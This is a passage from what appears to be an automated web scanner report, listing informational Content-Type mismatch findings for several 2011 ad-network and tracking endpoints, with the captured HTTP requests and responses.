Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=1; domain=.a1.interclick.com; expires=Thu, 19-May-2011 15:38:17 GMT; path=/
Set-Cookie: FC_51=128531=17622395:1; domain=.a1.interclick.com; expires=Tue, 10-May-2011 15:38:17 GMT; path=/
Set-Cookie: IFC=n=1&w50020=1&a128531=1&e=634406242976940565; domain=.a1.interclick.com; expires=Tue, 10-May-2011 15:38:17 GMT; path=/
Set-Cookie: Aqprep_Banner300X250=128531=634405378976970568:50020; domain=.a1.interclick.com; expires=Sun, 07-Aug-2011 15:38:17 GMT; path=/
Set-Cookie: Li=1=734265&30=734245; domain=.a1.interclick.com; expires=Wed, 08-Jun-2011 15:38:17 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 836

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.15%3Bsz%3D300x250%3Bclick%3Dhttp%3A//a1.interclick.com/i
...[SNIP]...

25.5. http://ad.doubleclick.net/pfadx/csmonitor_cim/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /pfadx/csmonitor_cim/;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;ord=1304955298754? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;240052939;1-0;0;58826896;24/24;41597568/41615355/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;~cs=w
Date: Mon, 09 May 2011 15:35:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1217

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;240052939;1-0;0;58826896;24/24;41597568/41615355/1;;~aopt=2/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic1
...[SNIP]...

25.6. http://adadvisor.net/adscores/g.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adadvisor.net
Path:   /adscores/g.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adscores/g.js?sid=9212076087 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/ticolscr.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:28 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 38
Content-Type: application/javascript

TargusCallback("000", "", "", "", "");

25.7. http://ads.bridgetrack.com/ads_v2/script/btwrite.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.bridgetrack.com
Path:   /ads_v2/script/btwrite.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ads_v2/script/btwrite.js HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://ads.bridgetrack.com/a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=D59645850CE345599D5D3B6C8708440E&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592007&Cr=70715&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; ATV164=42111d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODcccccccccccccc; BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400,public
Content-Type: text/html
Expires: Tue, 10 May 2011 15:37:41 GMT
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:41 GMT
Connection: close
Content-Length: 49


function BTWrite( s )
{
document.write(s);
}

25.8. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:35|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB%26num%3D1%26sig%3DAGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.18015406071208417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=D9A20400-8E82-28EE-0209-AFE0003E0200; PRca=|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4400
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVlODIAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-9495-C8E0-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

25.9. http://amch.questionmarket.com/adscgen/sta.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/sta.php?survey_num=887938&site=2320695&code=4862365&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b202.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 168
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


25.10. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p97174789&1304955333231 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304955323%2E101%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

25.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001juYhaL6r07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001iRpfaL7W0c9M00001juYhaL6q07Kl00001jAsGaJH602WG00003jBofaIOs07Si00001; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut910n0000000001uy98nW0000000001uy; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 2338

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

25.12. http://cdn.rpxnow.com/rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.rpxnow.com
Path:   /rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js HTTP/1.1
Host: cdn.rpxnow.com
Proxy-Connection: keep-alive
Referer: http://login.npr.org/openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: Ql95x+cygsoPp4d6d79gHKoDZpYjT4EG0TkYUBAoS6G5cPZduzmk+p3wJjkj+Qyd
x-amz-request-id: E492686DC31D5B48
Date: Mon, 02 May 2011 19:29:13 GMT
Cache-Control: public, max-age=307584000
Last-Modified: Fri, 22 Apr 2011 18:44:20 GMT
ETag: "28a35f3454bf56715fe8f8b20c5b1fff"
Accept-Ranges: bytes
Content-Type: text/javascript; charset=utf-8
Server: AmazonS3
Age: 591041
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 9417e4235ed81e69ea733c3e9923c70af92f1e7abb32dc0c4a70efaee0d0a4b82aabe90c21993c1d
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 2b0986af7f8d32d3d4b4cf9330702abf.cloudfront.net:11180 (CloudFront)
Connection: keep-alive
Content-Length: 62638

(function(b){var aw,aE,am,t,y,aB,e,z,n,an,J,w,aO,ah,a2,x,at,ak,A,O,aL,ad,ar,aP,U,E,aW,Y,C,u,aM,s,a,aR,L,aD,P,al,T,aT,aV,F,aN,af,G,aF,a0,S,ay,q,av,r,f,aZ,aS,aA,h,V,X,aa,a1,R,aU,aJ,p,ao,aI,d,M,m,ax,Z,aj
...[SNIP]...

25.13. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://contextweb.usatoday.net
Path:   /asp/Context/ContextWebHandler.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /asp/Context/ContextWebHandler.ashx?URL=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Fstormcenter%2Fdefault.htm HTTP/1.1
Host: contextweb.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 93
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: private, max-age=2592000
Date: Mon, 09 May 2011 15:36:35 GMT
Connection: close

var ContextWebKeywords="key=cw27+cw296+cw22+cw5+cw461+cw9+cw145;kvcw=27:296:22:5:461:9:145;";

25.14. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&uid=ZC45X9Axu6NOUFfX_289669&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=172249&iad=1304955321345-89810743578709660&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3BA3B870213B0BC2343870AF21CD1B45; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 09 May 2011 15:35:21 GMT
Connection: close

